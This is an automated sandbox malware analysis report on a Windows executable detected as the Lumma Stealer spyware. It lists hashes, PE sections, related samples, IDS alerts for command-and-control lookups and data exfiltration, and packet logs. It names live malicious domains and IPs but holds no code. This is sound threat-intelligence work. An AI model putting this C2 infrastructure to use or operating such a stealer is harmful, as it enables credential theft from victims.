                                                                                                                                                                                      https://store.steampowered.com/legal/hx0wBsOjkQ.exe, 00000000.00000003.1495388507.0000000000E63000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1495405618.0000000000DF3000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1495301417.0000000000DF3000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1495487358.0000000000DFE000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1517261667.0000000000E6B000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1495179656.0000000000E5D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                        high
                                                                                                                                                                                        https://community.fastly.steamstatic.com/public/shared/javascript/tooltip.js?v=QYkT4eS5mbTN&amp;l=enhx0wBsOjkQ.exe, 00000000.00000003.1495388507.0000000000E63000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1495179656.0000000000E5D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                          high
                                                                                                                                                                                          https://community.fastly.steamstatic.com/public/javascript/prototype-1.7.js?v=npJElBnrEO6W&amp;l=enghx0wBsOjkQ.exe, 00000000.00000003.1495388507.0000000000E63000.00000004.00000020.00020000.00000000.sdmp, hx0wBsOjkQ.exe, 00000000.00000003.1495179656.0000000000E5D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                            high
                                                                                                                                                                                            https://lev-tolstoi.com/9hx0wBsOjkQ.exe, 00000000.00000002.1673905575.0000000000E61000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                            • Avira URL Cloud: malware
IP | Domain | Country | ASN | ASN Name | Malicious
172.67.157.254 | lev-tolstoi.com | United States | 13335 | CLOUDFLARENETUS | false
23.55.153.106 | steamcommunity.com | United States | 20940 | AKAMAI-ASN1EU | false
                                                                                                                                                                                                                      Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                                                                      Analysis ID:1581582
                                                                                                                                                                                                                      Start date and time:2024-12-28 09:28:25 +01:00
                                                                                                                                                                                                                      Joe Sandbox product:CloudBasic
                                                                                                                                                                                                                      Overall analysis duration:0h 5m 10s
                                                                                                                                                                                                                      Hypervisor based Inspection enabled:false
                                                                                                                                                                                                                      Report type:full
                                                                                                                                                                                                                      Cookbook file name:default.jbs
                                                                                                                                                                                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                                                      Number of analysed new started processes analysed:5
                                                                                                                                                                                                                      Number of new started drivers analysed:0
                                                                                                                                                                                                                      Number of existing processes analysed:0
                                                                                                                                                                                                                      Number of existing drivers analysed:0
                                                                                                                                                                                                                      Number of injected processes analysed:0
                                                                                                                                                                                                                      Technologies:
                                                                                                                                                                                                                      • HCA enabled
                                                                                                                                                                                                                      • EGA enabled
                                                                                                                                                                                                                      • AMSI enabled
                                                                                                                                                                                                                      Analysis Mode:default
                                                                                                                                                                                                                      Analysis stop reason:Timeout
                                                                                                                                                                                                                      Sample name:hx0wBsOjkQ.exe
                                                                                                                                                                                                                      renamed because original name is a hash value
                                                                                                                                                                                                                      Original Sample Name:e58e6e26d4ff748bd8e7f718372f8351.exe
                                                                                                                                                                                                                      Detection:MAL
                                                                                                                                                                                                                      Classification:mal100.troj.spyw.evad.winEXE@1/0@11/2
                                                                                                                                                                                                                      EGA Information:
                                                                                                                                                                                                                      • Successful, ratio: 100%
                                                                                                                                                                                                                      HCA Information:Failed
                                                                                                                                                                                                                      Cookbook Comments:
                                                                                                                                                                                                                      • Found application associated with file extension: .exe
                                                                                                                                                                                                                      • Stop behavior analysis, all processes terminated
                                                                                                                                                                                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, SIHClient.exe, conhost.exe
                                                                                                                                                                                                                      • Excluded IPs from analysis (whitelisted): 172.202.163.200, 4.245.163.56
                                                                                                                                                                                                                      • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed, report is missing behavior information
                                                                                                                                                                                                                      • Report size getting too big, too many NtOpenFile calls found.
                                                                                                                                                                                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                                      • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
03:29:36 | API Interceptor | 11x Sleep call for process: hx0wBsOjkQ.exe modified
                                                                                                                                                                                                                                                              Vq50tK1Nx2.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                              • 104.21.66.86
                                                                                                                                                                                                                                                              IzDjbVdHha.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                              • 172.67.157.254
                                                                                                                                                                                                                                                              steamcommunity.comfnnGMmd8eJ.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                              • 23.55.153.106
                                                                                                                                                                                                                                                              PW6pjyv02h.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                              • 23.55.153.106
                                                                                                                                                                                                                                                              Solara-v3.0.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                              • 23.55.153.106
                                                                                                                                                                                                                                                              Script.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                              • 23.55.153.106
                                                                                                                                                                                                                                                              Neverlose.cc-unpadded.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                              • 23.55.153.106
                                                                                                                                                                                                                                                              Aura.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                              • 23.55.153.106
                                                                                                                                                                                                                                                              Aura.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                              • 23.55.153.106
                                                                                                                                                                                                                                                              Installer.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                              • 23.55.153.106
                                                                                                                                                                                                                                                              Installer.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                              • 104.121.10.34
                                                                                                                                                                                                                                                              SoftWare(1).exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                              • 104.102.49.254
                                                                                                                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                              AKAMAI-ASN1EUfnnGMmd8eJ.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                              • 23.55.153.106
                                                                                                                                                                                                                                                              PW6pjyv02h.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                              • 23.55.153.106
                                                                                                                                                                                                                                                              Solara-v3.0.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                              • 23.55.153.106
                                                                                                                                                                                                                                                              Script.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                              • 23.55.153.106
                                                                                                                                                                                                                                                              Neverlose.cc-unpadded.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                              • 23.55.153.106
                                                                                                                                                                                                                                                              Aura.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                              • 23.55.153.106
                                                                                                                                                                                                                                                              Aura.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                              • 23.55.153.106
                                                                                                                                                                                                                                                              Installer.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                              • 23.55.153.106
                                                                                                                                                                                                                                                              Setup.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                              • 23.55.153.106
                                                                                                                                                                                                                                                              w22319us3M.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, PureLog Stealer, Stealc, Vidar, zgRATBrowse
                                                                                                                                                                                                                                                              • 23.55.153.106
                                                                                                                                                                                                                                                              CLOUDFLARENETUSfnnGMmd8eJ.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                              • 172.67.157.254
                                                                                                                                                                                                                                                              lumma.ps1Get hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                              • 172.67.167.249
                                                                                                                                                                                                                                                              BagsThroat.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                                                              • 104.21.80.1
                                                                                                                                                                                                                                                              ronwod.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                              • 104.21.92.219
                                                                                                                                                                                                                                                              ronwod.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                              • 172.67.198.222
                                                                                                                                                                                                                                                              installer_1.05_36.4.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                                                              • 172.67.166.49
                                                                                                                                                                                                                                                              Loader.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                              • 172.67.132.7
                                                                                                                                                                                                                                                              Solara-v3.0.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                              • 104.21.66.86
                                                                                                                                                                                                                                                              Script.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                              • 104.21.66.86
                                                                                                                                                                                                                                                              48.252.190.9.zipGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                              • 104.21.95.219
                                                                                                                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                              a0e9f5d64349fb13191bc781f81f42e1MrIOYC1Pns.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                              • 172.67.157.254
                                                                                                                                                                                                                                                              • 23.55.153.106
                                                                                                                                                                                                                                                              fnnGMmd8eJ.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                              • 172.67.157.254
                                                                                                                                                                                                                                                              • 23.55.153.106
                                                                                                                                                                                                                                                              PW6pjyv02h.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                              • 172.67.157.254
                                                                                                                                                                                                                                                              • 23.55.153.106
                                                                                                                                                                                                                                                              lumma.ps1Get hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                              • 172.67.157.254
                                                                                                                                                                                                                                                              • 23.55.153.106
                                                                                                                                                                                                                                                              BagsThroat.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                                                              • 172.67.157.254
                                                                                                                                                                                                                                                              • 23.55.153.106
                                                                                                                                                                                                                                                              ronwod.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                              • 172.67.157.254
                                                                                                                                                                                                                                                              • 23.55.153.106
                                                                                                                                                                                                                                                              ronwod.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                              • 172.67.157.254
                                                                                                                                                                                                                                                              • 23.55.153.106
                                                                                                                                                                                                                                                              installer_1.05_36.4.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                                                              • 172.67.157.254
                                                                                                                                                                                                                                                              • 23.55.153.106
                                                                                                                                                                                                                                                              Loader.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                              • 172.67.157.254
                                                                                                                                                                                                                                                              • 23.55.153.106
                                                                                                                                                                                                                                                              Solara-v3.0.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                              • 172.67.157.254
                                                                                                                                                                                                                                                              • 23.55.153.106
                                                                                                                                                                                                                                                              No context
                                                                                                                                                                                                                                                              No created / dropped files found
File type: PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit): 7.94864927061151
TrID:
• Win32 Executable (generic) a (10002005/4) 99.96%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: hx0wBsOjkQ.exe
File size: 1'810'944 bytes
MD5: e58e6e26d4ff748bd8e7f718372f8351
SHA1: 5ec62018f2c5e2f7b91be03fa1c022ad3368cab8
SHA256: 1b7cdc9c01de521674db6bc4f5ef66d4666d084cf197b8adec56bc431992c253
SHA512: f098d80f905726d009755079106940a9eb55c8ff824c3fc4770c11f4cc86be0d1b77fd2a857eab15e9791f29a86ffd7b3d7fdebf9d5a84c7ef9e117f6c690abe
SSDEEP: 49152:SrOGXYh1FPrUyF6pQ5kHQVxEPjoSLq9gjb9jrXLr:LGXmXrUukHQVu8t9gP9jr7
                                                                                                                                                                                                                                                              TLSH:1C85331BC569A872C62CDB300D96C7383C609BEC12FDE834FAA6AF14A25FE4B60D5155
                                                                                                                                                                                                                                                              File Content Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....Yig..............................G...........@...........................G...........@.................................Y@..m..
                                                                                                                                                                                                                                                              Icon Hash:90cececece8e8eb0
                                                                                                                                                                                                                                                              Entrypoint:0x87b000
                                                                                                                                                                                                                                                              Entrypoint Section:.taggant
                                                                                                                                                                                                                                                              Digitally signed:false
                                                                                                                                                                                                                                                              Imagebase:0x400000
                                                                                                                                                                                                                                                              Subsystem:windows gui
                                                                                                                                                                                                                                                              Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                                                                                                              DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                                                              Time Stamp:0x67695986 [Mon Dec 23 12:37:26 2024 UTC]
                                                                                                                                                                                                                                                              TLS Callbacks:
                                                                                                                                                                                                                                                              CLR (.Net) Version:
                                                                                                                                                                                                                                                              OS Version Major:6
                                                                                                                                                                                                                                                              OS Version Minor:0
                                                                                                                                                                                                                                                              File Version Major:6
                                                                                                                                                                                                                                                              File Version Minor:0
                                                                                                                                                                                                                                                              Subsystem Version Major:6
                                                                                                                                                                                                                                                              Subsystem Version Minor:0
                                                                                                                                                                                                                                                              Import Hash:2eabe9054cad5152567f0699947a2c5b
                                                                                                                                                                                                                                                              Instruction
                                                                                                                                                                                                                                                              add byte ptr [eax], al
                                                                                                                                                                                                                                                              add byte ptr [eax], al
| Name | Virtual Address | Virtual Size | Is in Section |
| IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IMPORT | 0x54059 | 0x6d | .idata |
| IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x53000 | 0x1ac | .rsrc |
| IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x541f8 | 0x8 | .idata |
| IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 | |

| Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics |
| | 0x1000 | 0x52000 | 0x26400 | 82ab32983a7161944787b5bb22578bab | False | 0.9996234170751634 | COM executable for DOS | 7.978175791647224 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| .rsrc | 0x53000 | 0x1ac | 0x200 | c4249243ceaeb236e3ce8ce2ab2c9a69 | False | 0.5390625 | data | 5.249019796122045 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| .idata | 0x54000 | 0x1000 | 0x200 | 39a711a7d804ccbc2a14eea65cf3c27e | False | 0.154296875 | data | 1.0789976601211375 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| | 0x55000 | 0x295000 | 0x200 | 85465ae03a5166e72d4cd95d27be198e | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| lzvphivs | 0x2ea000 | 0x190000 | 0x190000 | 1f9013ae66f8b3880a5d0b2a1a77d937 | False | 0.9948883056640625 | data | 7.954180945897147 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| rnhdfjfr | 0x47a000 | 0x1000 | 0x600 | 016cbff4d3f6e493def49542c8dcd7a1 | False | 0.6419270833333334 | data | 5.368554111073558 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| .taggant | 0x47b000 | 0x3000 | 0x2200 | fb09a72c380797f5719a994721443009 | False | 0.06261488970588236 | DOS executable (COM) | 0.781984085496635 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |

| Name | RVA | Size | Type | Language | Country | ZLIB Complexity |
| RT_MANIFEST | 0x53058 | 0x152 | ASCII text, with CRLF line terminators | | | 0.6479289940828402 |

| DLL | Import |
| kernel32.dll | lstrcpy |

| Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol |
| 2024-12-28T09:29:36.356310+0100 | 2058582 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (mindhandru .buzz) | 1 | 192.168.2.10 | 55284 | 1.1.1.1 | 53 | UDP |
| 2024-12-28T09:29:36.561159+0100 | 2058584 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (prisonyfork .buzz) | 1 | 192.168.2.10 | 60268 | 1.1.1.1 | 53 | UDP |
| 2024-12-28T09:29:36.804865+0100 | 2058586 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (rebuildeso .buzz) | 1 | 192.168.2.10 | 54830 | 1.1.1.1 | 53 | UDP |
| 2024-12-28T09:29:36.952553+0100 | 2058588 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (scentniej .buzz) | 1 | 192.168.2.10 | 58740 | 1.1.1.1 | 53 | UDP |
| 2024-12-28T09:29:37.100521+0100 | 2058580 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (inherineau .buzz) | 1 | 192.168.2.10 | 59321 | 1.1.1.1 | 53 | UDP |
| 2024-12-28T09:29:37.245130+0100 | 2058590 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (screwamusresz .buzz) | 1 | 192.168.2.10 | 60102 | 1.1.1.1 | 53 | UDP |
| 2024-12-28T09:29:37.387470+0100 | 2058572 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (appliacnesot .buzz) | 1 | 192.168.2.10 | 50916 | 1.1.1.1 | 53 | UDP |
| 2024-12-28T09:29:37.530359+0100 | 2058576 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (cashfuzysao .buzz) | 1 | 192.168.2.10 | 52703 | 1.1.1.1 | 53 | UDP |
| 2024-12-28T09:29:37.676217+0100 | 2058578 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (hummskitnj .buzz) | 1 | 192.168.2.10 | 52990 | 1.1.1.1 | 53 | UDP |
| 2024-12-28T09:29:39.410611+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.10 | 49700 | 23.55.153.106 | 443 | TCP |
| 2024-12-28T09:29:40.200416+0100 | 2858666 | ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup | 1 | 192.168.2.10 | 49700 | 23.55.153.106 | 443 | TCP |
| 2024-12-28T09:29:41.830604+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.10 | 49701 | 172.67.157.254 | 443 | TCP |
| 2024-12-28T09:29:42.579579+0100 | 2049836 | ET MALWARE Lumma Stealer Related Activity | 1 | 192.168.2.10 | 49701 | 172.67.157.254 | 443 | TCP |
| 2024-12-28T09:29:42.579579+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.10 | 49701 | 172.67.157.254 | 443 | TCP |
| 2024-12-28T09:29:43.843810+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.10 | 49702 | 172.67.157.254 | 443 | TCP |
| 2024-12-28T09:29:44.589530+0100 | 2049812 | ET MALWARE Lumma Stealer Related Activity M2 | 1 | 192.168.2.10 | 49702 | 172.67.157.254 | 443 | TCP |
| 2024-12-28T09:29:44.589530+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.10 | 49702 | 172.67.157.254 | 443 | TCP |
| 2024-12-28T09:29:46.317494+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.10 | 49703 | 172.67.157.254 | 443 | TCP |
| 2024-12-28T09:29:48.506896+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.10 | 49704 | 172.67.157.254 | 443 | TCP |
| 2024-12-28T09:29:49.645133+0100 | 2048094 | ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration | 1 | 192.168.2.10 | 49704 | 172.67.157.254 | 443 | TCP |
| 2024-12-28T09:29:51.109686+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.10 | 49705 | 172.67.157.254 | 443 | TCP |
| 2024-12-28T09:29:54.467025+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.10 | 49707 | 172.67.157.254 | 443 | TCP |
| 2024-12-28T09:29:57.393602+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.10 | 49710 | 172.67.157.254 | 443 | TCP |
| 2024-12-28T09:30:00.285341+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.10 | 49711 | 172.67.157.254 | 443 | TCP |

| Timestamp | Source Port | Dest Port | Source IP | Dest IP |
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:40.420170069 CET4434970023.55.153.106192.168.2.10
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:40.420178890 CET4434970023.55.153.106192.168.2.10
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:40.567720890 CET49701443192.168.2.10172.67.157.254
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:40.567773104 CET44349701172.67.157.254192.168.2.10
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:40.567835093 CET49701443192.168.2.10172.67.157.254
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:40.568221092 CET49701443192.168.2.10172.67.157.254
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:40.568234921 CET44349701172.67.157.254192.168.2.10
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:41.830440044 CET44349701172.67.157.254192.168.2.10
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:41.830604076 CET49701443192.168.2.10172.67.157.254
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:41.833621979 CET49701443192.168.2.10172.67.157.254
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:41.833635092 CET44349701172.67.157.254192.168.2.10
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:41.833925009 CET44349701172.67.157.254192.168.2.10
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:41.835246086 CET49701443192.168.2.10172.67.157.254
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:41.835266113 CET49701443192.168.2.10172.67.157.254
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:41.835325003 CET44349701172.67.157.254192.168.2.10
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:42.579576015 CET44349701172.67.157.254192.168.2.10
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:42.579682112 CET44349701172.67.157.254192.168.2.10
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:42.579741001 CET49701443192.168.2.10172.67.157.254
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:42.582010031 CET49701443192.168.2.10172.67.157.254
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:42.582024097 CET44349701172.67.157.254192.168.2.10
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:42.631688118 CET49702443192.168.2.10172.67.157.254
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:42.631738901 CET44349702172.67.157.254192.168.2.10
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:42.631863117 CET49702443192.168.2.10172.67.157.254
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:42.632406950 CET49702443192.168.2.10172.67.157.254
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:42.632422924 CET44349702172.67.157.254192.168.2.10
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:43.843683958 CET44349702172.67.157.254192.168.2.10
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:43.843810081 CET49702443192.168.2.10172.67.157.254
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:43.845043898 CET49702443192.168.2.10172.67.157.254
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:43.845053911 CET44349702172.67.157.254192.168.2.10
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:43.845295906 CET44349702172.67.157.254192.168.2.10
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:43.846489906 CET49702443192.168.2.10172.67.157.254
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:43.846553087 CET49702443192.168.2.10172.67.157.254
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:43.846566916 CET44349702172.67.157.254192.168.2.10
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:44.589555025 CET44349702172.67.157.254192.168.2.10
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:44.589636087 CET44349702172.67.157.254192.168.2.10
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:44.589672089 CET44349702172.67.157.254192.168.2.10
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:44.589713097 CET49702443192.168.2.10172.67.157.254
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:44.589729071 CET44349702172.67.157.254192.168.2.10
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:44.589812040 CET44349702172.67.157.254192.168.2.10
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:44.589850903 CET44349702172.67.157.254192.168.2.10
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:44.589852095 CET49702443192.168.2.10172.67.157.254
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:44.589862108 CET44349702172.67.157.254192.168.2.10
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:44.589907885 CET49702443192.168.2.10172.67.157.254
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:44.597790003 CET44349702172.67.157.254192.168.2.10
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:44.597846031 CET49702443192.168.2.10172.67.157.254
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:44.606231928 CET44349702172.67.157.254192.168.2.10
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:44.614464045 CET44349702172.67.157.254192.168.2.10
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:44.615478992 CET49702443192.168.2.10172.67.157.254
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:44.615489006 CET44349702172.67.157.254192.168.2.10
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:44.659852982 CET49702443192.168.2.10172.67.157.254
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:44.708991051 CET44349702172.67.157.254192.168.2.10
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:44.753771067 CET49702443192.168.2.10172.67.157.254
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:44.753782988 CET44349702172.67.157.254192.168.2.10
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:44.785098076 CET44349702172.67.157.254192.168.2.10
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:44.785145998 CET44349702172.67.157.254192.168.2.10
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:44.785242081 CET44349702172.67.157.254192.168.2.10
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:44.785250902 CET49702443192.168.2.10172.67.157.254
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:44.788975000 CET49702443192.168.2.10172.67.157.254
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:44.789428949 CET49702443192.168.2.10172.67.157.254
                                                                                                                                                                                                                                                              Dec 28, 2024 09:29:44.789453030 CET44349702172.67.157.254192.168.2.10
